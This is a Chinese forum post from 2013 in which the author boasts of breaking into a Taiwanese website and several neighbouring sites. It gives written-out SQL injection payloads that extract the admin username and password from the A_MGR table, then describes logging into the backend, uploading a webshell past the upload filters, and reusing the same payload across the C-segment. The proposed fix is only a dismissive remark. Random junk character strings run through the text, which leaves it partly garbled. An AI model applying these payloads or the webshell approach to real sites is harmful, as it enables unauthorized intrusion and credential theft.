发现一个注入点
$ [8 a7 g% H p! Fhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
/ E& U9 G+ }1 ?! c- T: X3 O
7 G5 J* U! S# g8 ?习惯性的加’having1=1--
0 { r |: l) a% i: W" L' h
& i/ F, h8 z+ Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
& r2 n0 o) ?2 S3 ~2 m& ^' S3 h7 o9 K' {/ X7 e6 X' N
0
0 d) i- T; z: ~9 T' ?$ {# d/ G0 _2 N2 L
爆出Diary_A.dl_Title(这时候很激动啊)
/ |7 k$ ]0 Y. {$ k( Z5 Y# z2 `" D3 g- }" h
那么继续. j1 c$ `0 Q0 g: H) B/ l( B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
9 s7 h4 Y8 I6 O. W' l6 |; R6 {' i f: u- S& p! i
继续,一直爆下去
# M- h% h+ K4 F! {7 J
7 N% y( Z% R+ |5 O爆到几个字段和表段 但是没找到需要的管理用户的字段
. Z8 i# L* N$ W' r! B+ p7 W: U- u3 b E
蛋疼了 怎么办 然后去后台登陆页看源码
5 m2 I! s; \0 i) v8 `3 T+ A3 B; b# U; S
0
- y a. ^8 J4 y+ X5 s: b3 E$ b5 w+ ?) D1 ^# [, X. \. l# k- }
Input name= “ADUID”. i: c, h( B* ~
Input name= “ADPWD”
9 T4 E3 k" _" X$ P+ Q2 w- d
+ S- j! g9 Y& R4 |1 t- D( }9 k很幸运 找到了字段那就继续
5 E: w) c; C, f& g5 }* H+ s, c1 j) L找到之后开始爆用户5 l) H( s0 i, m# ~
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—7 t4 e3 V) E* j
爆密码( \2 l! E/ j7 w: b8 @7 b
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—& l _$ ?1 |' G( k
测试了下 这个注入点只能爆到文章哪里的表 : M# ~6 N" D' H: y# t* N
- e0 Z/ R* Y4 K' H8 Q+ |, ~
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了$ O9 a6 T Y( C$ R+ ]7 R2 H
# l% u1 ^3 Q& _1 r" }- y' c又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了' J" Q* z: R7 ~. s
! w9 }. r% _; F. T; e2 Z( R# ^
473
; ?( Z6 M/ F0 E# S% x& n/ H" ]9 Z! L
进后台. _# f& T L4 _4 g1 v& z6 a# K
6 G& S% e; K3 V( {* z
+ R- _3 k* e4 M: R# Y' x# u9 g发现几个上传点 有的地方不能上传 而且防止恶意代码' }) n/ c0 C4 z! T: R
# e7 _0 |% g$ {+ R4 ]' e9 }1 o2 T没办法 各种百度各种找大牛 找到一只好像可以突破的马$ @8 n) o. O. c7 g
$ W+ j9 r/ Q2 P S6 ~# J) |" T, p% N' R) k
在系统管理那里直接上传 不过没有显示地址
6 E# x/ O. g+ o. }3 C
+ H: \* n! p% { W% T4 p% `; ~# U再上传一次 抓包 搞定OK" K3 k; m' h1 w R
0 a$ Q% o, ?; j2 h. y" x+ U! h' a6 K" E) U4 e9 |) f4 S4 x
+ [ V \. x0 x8 |2 D5 h6 j
472' Z3 i2 _) \4 k% S! z7 n9 p& i
# y$ F# m# P* O6 z9 p6 ~晚上不行了 去睡觉。。。
3 n# `9 u" k3 V- j! j* M% ]* o第二天刚起床 闲的没事做继续日站吧 9 j" v+ v1 j3 k- J* {% h
, f8 ], \/ L8 U8 ?: U$ _
找个站 就把这个站的旁c扫了下
7 i; a a/ S- J( `: e" B, q; w/ J9 t+ y: ]: [
发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 J: ]) `; R1 y" V
/ O+ X8 I" A4 H, H# |; h就找到会员登录口测试6 m) X7 Z& Z; C7 p: @. K" K
6 T, Z" x2 T+ B; C& \1 P'and (select top 1 MGR_UID from A_MGR)>0—
! E9 G" E0 {$ ^果断爆到了 这时候我很激动 通杀! k! p9 }7 I |7 e6 R
5 m D/ W2 |" U$ V
再次翻c段% F; ~2 n6 h3 ]- }( b; |* ]/ ^
) k7 V& F, w/ N* l( E2 F
翻出几个站 都成功拿下
3 x1 p# R* f7 t& X; }" _* V# \8 g
$ k" w" T( I2 D( T; I8 a
1 @) } z* P. U( f: O& l9 y. r' Z; x7 [
修复方案:
/ Q1 J4 f5 ^ ^他们比我专业 4 h" x/ d7 @- r6 B" B' j8 P! i _
S4 |2 h0 v+ `( Q) b: v- E. o" ]* W: y
, k$ v8 R1 |) O+ D1 X G
|
发表于 2013-4-4 17:40:38
收藏
支持
反对